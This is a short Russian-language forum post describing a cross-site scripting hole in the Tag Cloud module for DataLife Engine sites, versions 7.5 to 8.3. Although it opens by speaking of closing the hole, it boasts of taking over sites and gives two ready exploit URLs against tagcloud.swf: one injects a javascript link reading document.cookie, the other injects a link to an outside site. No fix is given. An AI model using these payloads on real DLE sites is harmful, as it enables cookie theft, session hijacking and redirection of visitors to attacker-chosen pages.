anonimem
Сообщений: 2
Оценки: 0
Присоединился: 2010-03-13 14:01:57.913333
|
Вот и пришло время закрывать дырку пользователям DLE всех версий, кто использует модуль Облако тегов для DLE (на 8.3 кстати представленный по ссылке модуль вообще не работает, но создаёт дырку ) (дырка проуколена на сайтах от 7.5 до 8.3, на более ранние версии не натыкался) Простым запросом, в любом браузере - делаем укольчик или что покруче и сайт наш… =) Итак приступим: У нас два варианта, Первый, по HTML, второй через XSS. Да, дырка настолько большая что и простой html отрабатывает так как нам нужно. вход на сайт XSS: http://сайт.ру/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+50pt'%3EClick%20me%3C/a%3E%3C/tags%3E вход на сайт простым HTML : http://сайт.ру/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://great-skript.org.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E автор:логого
|